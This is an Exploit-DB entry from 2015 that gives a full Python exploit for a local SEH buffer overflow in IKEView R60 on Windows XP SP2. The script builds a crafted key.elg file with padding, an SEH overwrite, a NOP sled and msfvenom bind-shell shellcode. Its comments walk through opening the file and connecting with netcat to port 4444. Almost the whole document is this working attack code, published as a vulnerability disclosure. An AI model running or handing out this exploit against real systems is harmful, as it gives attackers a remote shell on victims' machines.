IKEView R60 - Buffer Overflow Local Exploit SEH

2015-09-17T00:00:00
ID EDB-ID:38220
Type exploitdb
Reporter VIKRAMADITYA
Modified 2015-09-17T00:00:00

Description

IKEView R60 - Buffer Overflow Local Exploit (SEH). Local exploit for windows platform

                                        
                                            #!/usr/bin/python
# EXPLOIT TITLE: IKEView R60 Buffer overflow(SEH) Local Exploit
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Credits: hyp3rlinx
# Date of Testing: 17th September 2015
# Download Link : https://www.exploit-db.com/apps/e74a3dcf9bd8a2dd05026532fbf9bb36-IKEView.exe
# Tested On : Windows XP Service Pack 2
# Steps to Exploit
# Step 1: Execute this python script
# Step 2: This script will create a file called key.elg 
# Step 3: Open this file with IKEView.exe
# That should open a bind tcp port at 4444
# Step 4: Connect with netcat at port 4444

file = open('key.elg'  , 'w');

# bad characters  - \x09\x0a\x00\x0a\x0b\x0c\x0d\x0e\x0f\x20
buffer = "A"*4424 + "\xEB\x18\x90\x90" + "\xc0\x28\x40\x00" + "\x90" * 30

# msfvenom -p windows/shell_bind_tcp -b '\x09\x0a\x00\x0a\x0b\x0c\x0d\x0e\x0f\x20'  -f c

buffer += ("\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa3\x9f"
"\x17\x99\x83\xeb\xfc\xe2\xf4\x5f\x77\x95\x99\xa3\x9f\x77\x10"
"\x46\xae\xd7\xfd\x28\xcf\x27\x12\xf1\x93\x9c\xcb\xb7\x14\x65"
"\xb1\xac\x28\x5d\xbf\x92\x60\xbb\xa5\xc2\xe3\x15\xb5\x83\x5e"
"\xd8\x94\xa2\x58\xf5\x6b\xf1\xc8\x9c\xcb\xb3\x14\x5d\xa5\x28"
"\xd3\x06\xe1\x40\xd7\x16\x48\xf2\x14\x4e\xb9\xa2\x4c\x9c\xd0"
"\xbb\x7c\x2d\xd0\x28\xab\x9c\x98\x75\xae\xe8\x35\x62\x50\x1a"
"\x98\x64\xa7\xf7\xec\x55\x9c\x6a\x61\x98\xe2\x33\xec\x47\xc7"
"\x9c\xc1\x87\x9e\xc4\xff\x28\x93\x5c\x12\xfb\x83\x16\x4a\x28"
"\x9b\x9c\x98\x73\x16\x53\xbd\x87\xc4\x4c\xf8\xfa\xc5\x46\x66"
"\x43\xc0\x48\xc3\x28\x8d\xfc\x14\xfe\xf7\x24\xab\xa3\x9f\x7f"
"\xee\xd0\xad\x48\xcd\xcb\xd3\x60\xbf\xa4\x60\xc2\x21\x33\x9e"
"\x17\x99\x8a\x5b\x43\xc9\xcb\xb6\x97\xf2\xa3\x60\xc2\xf3\xab"
"\xc6\x47\x7b\x5e\xdf\x47\xd9\xf3\xf7\xfd\x96\x7c\x7f\xe8\x4c"
"\x34\xf7\x15\x99\xb2\xc3\x9e\x7f\xc9\x8f\x41\xce\xcb\x5d\xcc"
"\xae\xc4\x60\xc2\xce\xcb\x28\xfe\xa1\x5c\x60\xc2\xce\xcb\xeb"
"\xfb\xa2\x42\x60\xc2\xce\x34\xf7\x62\xf7\xee\xfe\xe8\x4c\xcb"
"\xfc\x7a\xfd\xa3\x16\xf4\xce\xf4\xc8\x26\x6f\xc9\x8d\x4e\xcf"
"\x41\x62\x71\x5e\xe7\xbb\x2b\x98\xa2\x12\x53\xbd\xb3\x59\x17"
"\xdd\xf7\xcf\x41\xcf\xf5\xd9\x41\xd7\xf5\xc9\x44\xcf\xcb\xe6"
"\xdb\xa6\x25\x60\xc2\x10\x43\xd1\x41\xdf\x5c\xaf\x7f\x91\x24"
"\x82\x77\x66\x76\x24\xe7\x2c\x01\xc9\x7f\x3f\x36\x22\x8a\x66"
"\x76\xa3\x11\xe5\xa9\x1f\xec\x79\xd6\x9a\xac\xde\xb0\xed\x78"
"\xf3\xa3\xcc\xe8\x4c")
file.write(buffer)
file.close()